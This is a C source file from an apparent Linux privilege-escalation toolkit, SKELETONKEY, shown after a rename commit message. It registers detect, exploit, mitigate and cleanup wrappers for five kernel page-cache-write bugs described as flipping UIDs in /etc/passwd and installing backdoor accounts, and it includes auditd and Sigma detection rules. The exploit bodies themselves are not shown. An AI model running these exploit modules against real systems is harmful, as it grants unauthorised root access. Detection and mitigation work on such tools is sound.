leviathan/SKELETONKEY
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SKELETONKEY/modules/copy_fail_family/skeletonkey_modules.c
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rename: IAMROOT → SKELETONKEY across the entire project 
Breaking change. Tool name, binary name, function/type names,
constant names, env vars, header guards, file paths, and GitHub
repo URL all rebrand IAMROOT → SKELETONKEY.

Changes:
  - All "IAMROOT" → "SKELETONKEY" (constants, env vars, enum
    values, docs, comments)
  - All "iamroot" → "skeletonkey" (functions, types, paths, CLI)
  - iamroot.c → skeletonkey.c
  - modules/*/iamroot_modules.{c,h} → modules/*/skeletonkey_modules.{c,h}
  - tools/iamroot-fleet-scan.sh → tools/skeletonkey-fleet-scan.sh
  - Binary "iamroot" → "skeletonkey"
  - GitHub URL KaraZajac/IAMROOT → KaraZajac/SKELETONKEY
  - .gitignore now expects build output named "skeletonkey"
  - /tmp/iamroot-* tmpfiles → /tmp/skeletonkey-*
  - Env vars IAMROOT_MODPROBE_PATH etc. → SKELETONKEY_*

New ASCII skeleton-key banner (horizontal key icon + ANSI Shadow
SKELETONKEY block letters) replaces the IAMROOT banner in
skeletonkey.c and README.md.

VERSION: 0.3.1 → 0.4.0 (breaking).

Build clean on Debian 6.12.86. `skeletonkey --version` → 0.4.0.
All 24 modules still register; no functional code changes — pure
rename + banner refresh.
2026-05-16 22:43:49 -04:00

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/*
* copy_fail_family — SKELETONKEY module bridge layer
*
* Wraps the existing per-CVE detect/exploit functions (from the
* absorbed DIRTYFAIL codebase) as standard skeletonkey_module entries.
*
* The bridge functions translate between the family's df_result_t
* (defined in src/common.h) and skeletonkey_result_t (defined in
* core/module.h). Numeric values are identical by design so the
* translation is a direct cast.
*
* skeletonkey_ctx fields (no_color, json, active_probe, no_shell) are
* forwarded to the family's existing global flags before each
* callback. This preserves DIRTYFAIL's existing CLI semantics
* unchanged.
*/
#include "skeletonkey_modules.h"
#include "../../core/registry.h"
#include "src/common.h"
#include "src/copyfail.h"
#include "src/copyfail_gcm.h"
#include "src/dirtyfrag_esp.h"
#include "src/dirtyfrag_esp6.h"
#include "src/dirtyfrag_rxrpc.h"
#include "src/mitigate.h"
#include <sys/stat.h>
static void apply_ctx(const struct skeletonkey_ctx *ctx)
{
dirtyfail_use_color = !ctx->no_color;
dirtyfail_active_probes = ctx->active_probe;
dirtyfail_json = ctx->json;
/* dirtyfail_no_revert is intentionally not driven from ctx —
* it's a debug knob; default stays off. */
}
/* ----- Family-wide --mitigate / --cleanup -----
*
* The family-wide mitigation (blacklist algif_aead + esp4 + esp6 + rxrpc,
* set apparmor_restrict_unprivileged_userns=1, drop_caches) is the same
* for every member of this family. All 5 modules' .mitigate fields
* therefore point at the same wrapper.
*
* For .cleanup we route based on visible state:
* - If the mitigation conf file is present, the user most recently
* ran --mitigate → revert that.
* - Otherwise the user ran --exploit → evict /etc/passwd from page
* cache.
* This is a heuristic, not a state machine. Sufficient for the common
* usage patterns. */
#define CFF_MITIGATE_CONF "/etc/modprobe.d/dirtyfail-mitigations.conf"
static skeletonkey_result_t copy_fail_family_mitigate(const struct skeletonkey_ctx *ctx)
{
apply_ctx(ctx);
return (skeletonkey_result_t)mitigate_apply();
}
static skeletonkey_result_t copy_fail_family_cleanup(const struct skeletonkey_ctx *ctx)
{
apply_ctx(ctx);
struct stat st;
if (stat(CFF_MITIGATE_CONF, &st) == 0) {
if (!ctx->json) {
fprintf(stderr, "[*] copy_fail_family: detected mitigation conf "
"(%s); reverting mitigation\n", CFF_MITIGATE_CONF);
}
return (skeletonkey_result_t)mitigate_revert();
}
if (!ctx->json) {
fprintf(stderr, "[*] copy_fail_family: no mitigation conf; "
"evicting /etc/passwd from page cache\n");
}
return try_revert_passwd_page_cache() ? SKELETONKEY_OK : SKELETONKEY_TEST_ERROR;
}
/* ----- copy_fail (CVE-2026-31431) ----- */
static skeletonkey_result_t copy_fail_detect_wrap(const struct skeletonkey_ctx *ctx)
{
apply_ctx(ctx);
return (skeletonkey_result_t)copyfail_detect();
}
static skeletonkey_result_t copy_fail_exploit_wrap(const struct skeletonkey_ctx *ctx)
{
apply_ctx(ctx);
return (skeletonkey_result_t)copyfail_exploit(!ctx->no_shell);
}
/* Shared detection rules for the copy_fail family — every member of
* this family exploits the same page-cache-write primitive and lands
* in the same files (/etc/passwd or /usr/bin/su). One rule set covers
* all five module entries. Per-module structs alias the same strings. */
static const char copy_fail_family_auditd[] =
"# Copy Fail family (CVE-2026-31431 + Dirty Frag CVE-2026-43284 + RxRPC CVE-2026-43500)\n"
"# Page-cache writes to passwd/shadow/su/sudoers from non-root.\n"
"-w /etc/passwd -p wa -k skeletonkey-copy-fail\n"
"-w /etc/shadow -p wa -k skeletonkey-copy-fail\n"
"-w /etc/sudoers -p wa -k skeletonkey-copy-fail\n"
"-w /etc/sudoers.d -p wa -k skeletonkey-copy-fail\n"
"-w /usr/bin/su -p wa -k skeletonkey-copy-fail\n"
"# AF_ALG socket creation by non-root — heavily used by exploit\n"
"-a always,exit -F arch=b64 -S socket -F a0=38 -k skeletonkey-copy-fail-afalg\n"
"# xfrm SA setup (Dirty Frag ESP variants)\n"
"-a always,exit -F arch=b64 -S setsockopt -k skeletonkey-copy-fail-xfrm\n";
static const char copy_fail_family_sigma[] =
"title: Copy Fail / Dirty Frag family exploitation\n"
"id: 4d8e6c2a-skeletonkey-copy-fail-family\n"
"status: experimental\n"
"description: |\n"
" Detects the file-modification footprint of Copy Fail (CVE-2026-31431) and\n"
" Dirty Frag siblings (CVE-2026-43284 v4/v6, CVE-2026-43500). Catches the\n"
" /etc/passwd UID-flip backdoor + the persistent backdoor account install.\n"
"logsource: {product: linux, service: auditd}\n"
"detection:\n"
" modification:\n"
" type: 'PATH'\n"
" name|startswith: ['/etc/passwd', '/etc/shadow', '/etc/sudoers', '/usr/bin/su']\n"
" not_root: {auid|expression: '!= 0'}\n"
" condition: modification and not_root\n"
"level: high\n"
"tags: [attack.privilege_escalation, attack.t1068, cve.2026.31431, cve.2026.43284, cve.2026.43500]\n";
const struct skeletonkey_module copy_fail_module = {
.name = "copy_fail",
.cve = "CVE-2026-31431",
.summary = "algif_aead authencesn page-cache write → /etc/passwd UID flip",
.family = "copy_fail_family",
.kernel_range = "≤ 6.12.84, fixed mainline 2026-04-22",
.detect = copy_fail_detect_wrap,
.exploit = copy_fail_exploit_wrap,
.mitigate = copy_fail_family_mitigate,
.cleanup = copy_fail_family_cleanup,
.detect_auditd = copy_fail_family_auditd,
.detect_sigma = copy_fail_family_sigma,
.detect_yara = NULL,
.detect_falco = NULL,
};
/* ----- copy_fail_gcm (variant, no CVE) ----- */
static skeletonkey_result_t copy_fail_gcm_detect_wrap(const struct skeletonkey_ctx *ctx)
{
apply_ctx(ctx);
return (skeletonkey_result_t)copyfail_gcm_detect();
}
static skeletonkey_result_t copy_fail_gcm_exploit_wrap(const struct skeletonkey_ctx *ctx)
{
apply_ctx(ctx);
return (skeletonkey_result_t)copyfail_gcm_exploit(!ctx->no_shell);
}
const struct skeletonkey_module copy_fail_gcm_module = {
.name = "copy_fail_gcm",
.cve = "VARIANT",
.summary = "rfc4106(gcm(aes)) single-byte page-cache write (Copy Fail sibling)",
.family = "copy_fail_family",
.kernel_range = "same as copy_fail; rfc4106(gcm(aes)) not in modprobe blacklist",
.detect = copy_fail_gcm_detect_wrap,
.exploit = copy_fail_gcm_exploit_wrap,
.mitigate = copy_fail_family_mitigate,
.cleanup = copy_fail_family_cleanup,
.detect_auditd = copy_fail_family_auditd,
.detect_sigma = copy_fail_family_sigma,
.detect_yara = NULL,
.detect_falco = NULL,
};
/* ----- dirty_frag_esp (CVE-2026-43284 v4) ----- */
static skeletonkey_result_t dirty_frag_esp_detect_wrap(const struct skeletonkey_ctx *ctx)
{
apply_ctx(ctx);
return (skeletonkey_result_t)dirtyfrag_esp_detect();
}
static skeletonkey_result_t dirty_frag_esp_exploit_wrap(const struct skeletonkey_ctx *ctx)
{
apply_ctx(ctx);
return (skeletonkey_result_t)dirtyfrag_esp_exploit(!ctx->no_shell);
}
const struct skeletonkey_module dirty_frag_esp_module = {
.name = "dirty_frag_esp",
.cve = "CVE-2026-43284",
.summary = "IPv4 xfrm-ESP page-cache write (Dirty Frag v4)",
.family = "copy_fail_family",
.kernel_range = "same family as copy_fail; xfrm-ESP path",
.detect = dirty_frag_esp_detect_wrap,
.exploit = dirty_frag_esp_exploit_wrap,
.mitigate = copy_fail_family_mitigate,
.cleanup = copy_fail_family_cleanup,
.detect_auditd = copy_fail_family_auditd,
.detect_sigma = copy_fail_family_sigma,
.detect_yara = NULL,
.detect_falco = NULL,
};
/* ----- dirty_frag_esp6 (CVE-2026-43284 v6) ----- */
static skeletonkey_result_t dirty_frag_esp6_detect_wrap(const struct skeletonkey_ctx *ctx)
{
apply_ctx(ctx);
return (skeletonkey_result_t)dirtyfrag_esp6_detect();
}
static skeletonkey_result_t dirty_frag_esp6_exploit_wrap(const struct skeletonkey_ctx *ctx)
{
apply_ctx(ctx);
return (skeletonkey_result_t)dirtyfrag_esp6_exploit(!ctx->no_shell);
}
const struct skeletonkey_module dirty_frag_esp6_module = {
.name = "dirty_frag_esp6",
.cve = "CVE-2026-43284",
.summary = "IPv6 xfrm-ESP page-cache write (Dirty Frag v6)",
.family = "copy_fail_family",
.kernel_range = "same family as copy_fail; xfrm-ESP6 path; V6 STORE shift auto-calibrated",
.detect = dirty_frag_esp6_detect_wrap,
.exploit = dirty_frag_esp6_exploit_wrap,
.mitigate = copy_fail_family_mitigate,
.cleanup = copy_fail_family_cleanup,
.detect_auditd = copy_fail_family_auditd,
.detect_sigma = copy_fail_family_sigma,
.detect_yara = NULL,
.detect_falco = NULL,
};
/* ----- dirty_frag_rxrpc (CVE-2026-43500) ----- */
static skeletonkey_result_t dirty_frag_rxrpc_detect_wrap(const struct skeletonkey_ctx *ctx)
{
apply_ctx(ctx);
return (skeletonkey_result_t)dirtyfrag_rxrpc_detect();
}
static skeletonkey_result_t dirty_frag_rxrpc_exploit_wrap(const struct skeletonkey_ctx *ctx)
{
apply_ctx(ctx);
return (skeletonkey_result_t)dirtyfrag_rxrpc_exploit(!ctx->no_shell);
}
const struct skeletonkey_module dirty_frag_rxrpc_module = {
.name = "dirty_frag_rxrpc",
.cve = "CVE-2026-43500",
.summary = "AF_RXRPC handshake forgery + page-cache write (Dirty Frag RxRPC)",
.family = "copy_fail_family",
.kernel_range = "kernels exposing AF_RXRPC + rxkad with fcrypt fallback",
.detect = dirty_frag_rxrpc_detect_wrap,
.exploit = dirty_frag_rxrpc_exploit_wrap,
.mitigate = copy_fail_family_mitigate,
.cleanup = copy_fail_family_cleanup,
.detect_auditd = copy_fail_family_auditd,
.detect_sigma = copy_fail_family_sigma,
.detect_yara = NULL,
.detect_falco = NULL,
};
/* ----- Family registration ----- */
void skeletonkey_register_copy_fail_family(void)
{
skeletonkey_register(&copy_fail_module);
skeletonkey_register(&copy_fail_gcm_module);
skeletonkey_register(&dirty_frag_esp_module);
skeletonkey_register(&dirty_frag_esp6_module);
skeletonkey_register(&dirty_frag_rxrpc_module);
}
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